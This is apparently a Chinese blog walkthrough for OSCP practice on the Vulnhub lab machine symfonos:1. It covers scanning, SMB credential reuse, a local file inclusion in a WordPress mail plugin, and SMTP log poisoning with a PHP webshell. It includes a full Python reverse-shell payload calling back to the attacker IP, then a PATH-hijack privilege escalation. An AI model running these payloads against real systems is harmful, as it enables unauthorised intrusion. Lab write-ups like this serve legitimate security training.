OSCP备考_0x18_Vulnhub靶机_symfonos: 1

Ethan医生2周前靶场34

名称说明
靶机下载链接https://www.vulnhub.com/entry/symfonos-1,322/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.185

arp-scan 192.168.233.1/24

image.png

nmap -p- 192.168.233.185  

image.png


nmap -p22,25,80,139,445 -A -T5 192.168.233.185

image.png


nmap -p139,445 -A -T5 --script=smb-enum-shares 192.168.233.185 

枚举下使用看看

image.png

由于目标主机开放smb服务,尝试使用smbclient连接,成功列出目标主机上的共享文件夹列表。

其中Sharename为共享文件夹的名称:print$为打印机驱动程序的共享文件夹,helios为用户helios个人共享文件夹,anonymous为匿名共享文件夹,IPC$为IPC服务的共享文件夹。

image.png

将文件下载get attention.txt

image.png

image.png

不要使用'epidioko', 'qwerty', 'baseball'

代表这应该就是其中用户的密码试试看使用这密码去登入其他账号

smbclient //192.168.233.185/helios -U helios,正确密码qwerty

image.png

image.png访问/h3l105发现是一个WordPress网站,Wappalyzer显示WordPress版本为5.2.2

http://symfonos.local/h3l105/ 需要绑定host

然后扫描wpscan --url http://symfonos.local/h3l105/ 


image.png

看到有扩展Masta查看漏洞

image.png

image.png


http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

image.png

然后使用telnet连接25端口


telnet 192.168.233.185 25


Trying 192.168.233.185...

Connected to 192.168.233.185.

Escape character is '^]'.

220 symfonos.localdomain ESMTP Postfix (Debian/GNU)

HELO helios

250 symfonos.localdomain

MAIL FROM: MALABIS

250 2.1.0 Ok

RCPT TO: helios

250 2.1.5 Ok

data

354 End data with <CR><LF>.<CR><LF>

<?php system($_GET['shell']); ?>

.

250 2.0.0 Ok: queued as 64E1340698

QUIT

221 2.0.0 Bye

Connection closed by foreign host.


然后再去查看他的挡案 是否已经写入刚刚的一句话木马,包含文件不用管是啥挡案如果是PHP挡案直接可以执行


http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&shell=

python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect((%22192.168.233.168%22,3333));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


这里使用python做反弹WEBSHELL

image.png

开始操作提权,sudo -l找不到 就查看看suid提权,发现到statuscheck看下是啥

image.png


image.png

有用到CURL那就用CURL进行提权

image.png

image.png

将curl放到tmp目录下然后执行时就会调用这个CURL

export PATH=/tmp:$PATH

PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

image.png



相关文章

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

OSCP备考_0x23_Vulnhub靶机_digitalworld.local: TORMENT

名称说明靶机下载链接https://www.vulnhub.com/entry/digitalworldlocal-torment,299/攻击机(kali)ip:192.168.233.168靶机(...

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

OSCP备考_0x03_HackThBox靶机_Linux_nibbles

信息收集nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.19 (扫描TCP)nmap -sU --top-ports 100 10.129...

OSCP备考_0x19_HackThBox靶机_Linux_haircut

OSCP备考_0x19_HackThBox靶机_Linux_haircut

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.82.246 (扫描TCP)        &n...

OSCP备考_0x04_HackThBox靶机_Linux_cronos

OSCP备考_0x04_HackThBox靶机_Linux_cronos

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。